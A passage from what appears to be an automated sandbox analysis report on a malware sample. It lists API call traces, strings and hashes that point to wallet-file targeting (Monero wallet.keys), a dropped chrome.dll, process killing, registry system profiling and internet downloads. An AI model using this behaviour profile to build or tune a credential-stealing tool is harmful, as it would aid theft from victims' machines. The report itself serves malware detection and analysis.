                                      • StrCmpCA.SHLWAPI(00000000,00E393B0), ref: 00120B79
                                      • StrCmpCA.SHLWAPI(00000000,00E392C0), ref: 00120A0C
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                      • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00120C35
                                      Strings
                                      • C:\ProgramData\chrome.dll, xrefs: 001208CD
                                      • C:\ProgramData\chrome.dll, xrefs: 00120C30
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                      • API String ID: 585553867-663540502
                                      • Opcode ID: 8148c234bacbf2a34c4d260c183abcd914bd34680146ac2dfb9c16a3a72a8589
                                      • Instruction ID: 883ed786f677569c77b50e1aa0353050cda40f297445007cbcef3dce61f072c9
                                      • Opcode Fuzzy Hash: 8148c234bacbf2a34c4d260c183abcd914bd34680146ac2dfb9c16a3a72a8589
                                      • Instruction Fuzzy Hash: 31A168717001089FCB28EF64D996EED777ABFA5300F50856DE40A5F251EB309A15CB92
                                      Function 00119E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00128CF0: GetSystemTime.KERNEL32(00130E1B,00E3E7B8,001305B6,?,?,001113F9,?,0000001A,00130E1B,00000000,?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 00128D16
                                      • wsprintfA.USER32 ref: 00119E7F
                                      • lstrcat.KERNEL32(00000000,?), ref: 00119F03
                                      • lstrcat.KERNEL32(00000000,?), ref: 00119F17
                                      • lstrcat.KERNEL32(00000000,001312D8), ref: 00119F29
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00119F7C
                                      • Sleep.KERNEL32(00001388), ref: 0011A013
                                        • Part of subcall function 001299A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001299C5
                                        • Part of subcall function 001299A0: Process32First.KERNEL32(0011A056,00000128), ref: 001299D9
                                        • Part of subcall function 001299A0: Process32Next.KERNEL32(0011A056,00000128), ref: 001299F2
                                        • Part of subcall function 001299A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00129A4E
                                        • Part of subcall function 001299A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00129A6C
                                        • Part of subcall function 001299A0: CloseHandle.KERNEL32(00000000), ref: 00129A79
                                        • Part of subcall function 001299A0: CloseHandle.KERNEL32(0011A056), ref: 00129A88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                      • String ID: D
                                      • API String ID: 531068710-2746444292
                                      • Opcode ID: 6202f592b046d5ea19ff7eb85f720942b7f4abf1779f1c119aa76b5a23ccfd9b
                                      • Instruction ID: f8fc1a52b404976a6b0c3e492a2e7f81454b332310fe7da44e3cd3a4b0d402dc
                                      • Opcode Fuzzy Hash: 6202f592b046d5ea19ff7eb85f720942b7f4abf1779f1c119aa76b5a23ccfd9b
                                      • Instruction Fuzzy Hash: 455174B1944318ABEB25DB60DC86FDA7378AF54700F404598F60DAB2C1EB75AB84CF51
                                      Function 0018F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 0018FA1F
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0018FA27
                                      • _ValidateLocalCookies.LIBCMT ref: 0018FAB0
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0018FADB
                                      • _ValidateLocalCookies.LIBCMT ref: 0018FB30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction ID: c6b1a7186c0d704ca423f54e4e375a8eb055db10d0279632192027797e075f56
                                      • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction Fuzzy Hash: CA41A535A00219EFCF14EF68C884A9E7BB5FF59324F148169E819AB391D7319A06CF91
                                      Function 00115000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0011501A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00115021
                                      • InternetOpenA.WININET(00130DE3,00000000,00000000,00000000,00000000), ref: 0011503A
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00115061
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00115091
                                      • InternetCloseHandle.WININET(?), ref: 00115109
                                      • InternetCloseHandle.WININET(?), ref: 00115116
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                      • String ID:
                                      • API String ID: 3066467675-0
                                      • Opcode ID: 4334bef937ecd813004af0c11e230a4ce637b5ca5d82f78def9804bc265a70c7
                                      • Instruction ID: 83dbc06f8400e22f2622ac01c169ac7add7d439fe5086ab2f81264afd2e6c339
                                      • Opcode Fuzzy Hash: 4334bef937ecd813004af0c11e230a4ce637b5ca5d82f78def9804bc265a70c7
                                      • Instruction Fuzzy Hash: 69311BB4A04218EBDB24CF94DC85BDCB7B5AB48304F5085D8F709A7281C7706EC58F98
                                      Function 0012856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001285B6
                                      • wsprintfA.USER32 ref: 001285E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0012860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0012861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00128629
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                      • RegQueryValueExA.ADVAPI32(00000000,00E3F3F8,00000000,000F003F,?,00000400), ref: 0012867C
                                      • lstrlen.KERNEL32(?), ref: 00128691
                                      • RegQueryValueExA.ADVAPI32(00000000,00E3F518,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00130B3C), ref: 00128729
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00128798
                                      • RegCloseKey.ADVAPI32(00000000), ref: 001287AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: ae762de052f2c8b269a824a692a55768f5c032d45d35b1f6d27cf13aec52a250
                                      • Instruction ID: cd016ab8b2e31722a38e91ca79c5c89aa31bc6564af13a8b6d0b56155e628e2d
                                      • Opcode Fuzzy Hash: ae762de052f2c8b269a824a692a55768f5c032d45d35b1f6d27cf13aec52a250
                                      • Instruction Fuzzy Hash: FA21FC7191522CABDB24DB54DC85FE9B3B8FB48700F1085D8E609A6180DF716A85CFE4
                                      Function 001299A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001299C5
                                      • Process32First.KERNEL32(0011A056,00000128), ref: 001299D9
                                      • Process32Next.KERNEL32(0011A056,00000128), ref: 001299F2
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00129A4E
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00129A6C
                                      • CloseHandle.KERNEL32(00000000), ref: 00129A79
                                      • CloseHandle.KERNEL32(0011A056), ref: 00129A88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 0087bd68b40f461624e1085f69dd5d8a9ee579e78af7b2365c66a227741b6283
                                      • Instruction ID: dc17f362442718d7bd5665432431b72202a22cdefc144d073a01922e74c2e74e
                                      • Opcode Fuzzy Hash: 0087bd68b40f461624e1085f69dd5d8a9ee579e78af7b2365c66a227741b6283
                                      • Instruction Fuzzy Hash: 3F21EA71904328ABDB35DFA5EC88BDDB7B9BB48304F1045C8E50AAB290D7749E94CF50
                                      Function 00127F90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00127FC7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00127FCE
                                      • RegOpenKeyExA.ADVAPI32(80000002,00E2B7D0,00000000,00020119,?), ref: 00127FEE
                                      • RegQueryValueExA.ADVAPI32(?,00E3E520,00000000,00000000,000000FF,000000FF), ref: 0012800F
                                      • RegCloseKey.ADVAPI32(?), ref: 00128022
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-3162483948
                                      • Opcode ID: 75a20fbadc5abd9309bc8d74eb5ab4cbee8aee771f83256cadba8a0bc077e418
                                      • Instruction ID: 8a51ee8efde5c571a3e0bc577a7803c0fef5ab8dd68892a81d09920dd64f059f
                                      • Opcode Fuzzy Hash: 75a20fbadc5abd9309bc8d74eb5ab4cbee8aee771f83256cadba8a0bc077e418
                                      • Instruction Fuzzy Hash: 78118FB1A44245EBD714CB84ED86F6FB7BCEB04B10F104219F611AB2C0D77558008BA1
                                      Function 00127820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00127834
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0012783B
                                      • RegOpenKeyExA.ADVAPI32(80000002,00E2B8B0,00000000,00020119,00000000), ref: 0012786D
                                      • RegQueryValueExA.ADVAPI32(00000000,00E3F320,00000000,00000000,?,000000FF), ref: 0012788E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00127898
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: 2eed73b9e2a805ae6efdb3281d3b459a4b94cea4b781e57009c203ab7f85234d
                                      • Instruction ID: c91c4271fb42de53b76e03214f94d86678dde155ad74c32faffc47f521aafe50
                                      • Opcode Fuzzy Hash: 2eed73b9e2a805ae6efdb3281d3b459a4b94cea4b781e57009c203ab7f85234d
                                      • Instruction Fuzzy Hash: F101FF75A48349FBEB11DBE4ED8AF6E777CEB48700F104598FA05AA2D0D770A950CB50
                                      Function 001278B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001278C4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001278CB
                                      • RegOpenKeyExA.ADVAPI32(80000002,00E2B8B0,00000000,00020119,00127849), ref: 001278EB
                                      • RegQueryValueExA.ADVAPI32(00127849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0012790A
                                      • RegCloseKey.ADVAPI32(00127849), ref: 00127914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: e6fc64d3caad25fdb2494289efe4480c399efe804c8ee2b264f9d9332437e511
                                      • Instruction ID: b8f2d8916fa9ad8507aff3ff928ff8f929b4f8743d9b75f615d8b9f7e39f5999
                                      • Opcode Fuzzy Hash: e6fc64d3caad25fdb2494289efe4480c399efe804c8ee2b264f9d9332437e511
                                      • Instruction Fuzzy Hash: 3901F4B5A44349BBDB11DBD4EC8AFAE777CEB44700F104598F605AB2C1D7706A508B90
                                      Function 0011A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0011A13C
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0011A161
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 0011A181
                                      • ReadFile.KERNEL32(000000FF,?,00000000,0011148F,00000000), ref: 0011A1AA
                                      • LocalFree.KERNEL32(0011148F), ref: 0011A1E0
